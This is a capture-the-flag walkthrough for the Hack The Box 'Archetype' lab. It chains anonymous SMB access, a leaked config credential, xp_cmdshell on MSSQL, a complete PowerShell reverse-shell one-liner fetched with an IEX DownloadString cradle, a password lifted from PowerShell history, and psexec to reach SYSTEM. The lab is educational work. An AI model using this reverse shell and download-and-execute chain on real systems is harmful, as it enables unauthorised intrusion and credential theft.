top of page



As always, let's start with nmap:

nmap -sV -sC IP

Replace IP by the IP of your target machine (Archetype)

The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.

We can see that port 445 is open which is usually associated with file sharing (SMB). So let's find out if we can list the shares available using:

smbclient -L IP
SMB authentication always require a username. If you don't specify one, it will use your VM username as default.

When prompted for the password just press enter

We can see there are 4 shares available. Let's check the first share called ADMIN$

smbclient \\\\IP\\ADMIN$

When prompted for the password, just press enter.

Access is denied.

Let's check the second share called backups:

smbclient \\\\IP\\backups

When prompted for the password, just press enter.

We got access to that share!


Let's download the file prod.dtsConfig to our VM

get prod.dtsConfig
The get command will download the file to your current directory/home directory. Open your home directory and check the content of that file

Looks like we found some credentials:

User ID=ARCHETYPE\sql_svc


To exit the share, just type:


Let's move on. The nmap we used at the beginning also showed that port 1433 is open, which is usually associated with SQL server. Now that we have some credentials, we just need to find a way to connect and authenticate to the MSSQL server. Let's use Impacket's tool to do that.

locate mssqlclient 

Let's change directory:

cd /usr/share/doc/python3-impacket/examples

This tells us that we need to type: username@targetIP

This also tells us that we need to add -windows-auth

python3 sql_svc@IP -windows-auth

Type the password we found earlier:


We successfully authenticated to the Microsoft SQL server!


Looks like we can use xp_cmdshell followed by the command we want to execute, using xp_cmdshell {cmd}

First, we need to enable it by typing enable_xp_cmdshell


We are told to run the RECONFIGURE statement to install


Now we can use xp_cmshell followed by a command we want to execute:

xp_cmdshell whoami

Now let's try to find out if we have sysadmin right by typing:


The output is 1 so it means we are part of the sysadmin group!

We just need to change 2 things from the script:

- The IP ---> this is the IP of your VM (the attackers' machine)

If you don't know your IP, open a new command prompt window and type ifconfig

- The port number ---> this is the port on which you will listen using netcat. We will start our netcat listener on port 4444

$client = New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Go to your Downloads folder and create a new file called shell.ps1

Open it and copy paste the script above, then save your file.

Now we need to get the target machine to go and download our PowerShell script shell.ps1

To do that, we will create a simple web server on our attacker's machine (our VM):

From your VM, open a new command prompt window and go to the Downloads directory:

cd Downloads
sudo python3 -m http.server 8080

This command will start a web server in our current directory (as in in the Downloads directory)

Do not close this window! Otherwise it will stop your web server.

Open your browser and check that the website has been created is the IP of my VM - it will be different for you. Make sure you type your VM's IP. If you don't know the IP of your VM, open a new command prompt window and type ifconfig

Now we need to install ufw (uncomplicated firewall) on our VM.

Open a new command prompt window and type

sudo apt install ufw

sudo ufw enable

We now need to add a rule so that the target machine can connect back to our attacker machine (our VM)

sudo ufw allow from proto tcp to any port 8080,4444 is the target machine

port 8080 because our webserver is on port 8080

port 4444 because we will start our netcat listener on port 4444

Now, still from your VM, open a new command prompt window and set up your netcat listener

nc -lnvp 4444

Only after you set up your netcat, go back to the target machine and type:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"\");" is the IP of my VM (attacker's machine) - The IP of your VM will be different. If you don't know the IP of your VP, open a new command prompt window and type ifconfig

Go back to your netcat and you should have a connection:



cd C:\Users


cd sql_svc


cd Desktop


type user.txt


You got the user flag! Congratulations!

It's always good to check the console history file where we can see the frequently accessed files and/or any executed commands. The history file is called ConsoleHost_history.txt and can be found in this directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine

cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine
cat ConsoleHost_history.txt

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

We just found more credentials!

The net use or net.exe use command is used to show detailed information about currently mapped drives and devices. It is used this way:

net use           [{devicename | *}]      \\computername\sharename /user:username

devicename ---> Use this option to specify the Drive letter (here Drive letter T)

\\computername\sharename ---> specifies the name of the computer, computername, and the shared resource, sharename

More info on net use can be found at

Privilege Escalation

Impacket also has a tool called and we can use this tool to connect to the server using the credentials we just found.

From your VM, open a new prompt window


cd /usr/share/doc/python3-impacket/examples


python3 administrator@ is the IP of the target machine

Type the password we just found and press enter



We just escalated our privileges and we are now the nt authority\system

You can usually find the root flag at C:\Users\Administrator\Desktop

cd C:\Users\Administrator\Desktop
type root.txt


Congratulations! you got the root flag!

5,576 views0 comments

Recent Posts

See All



Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page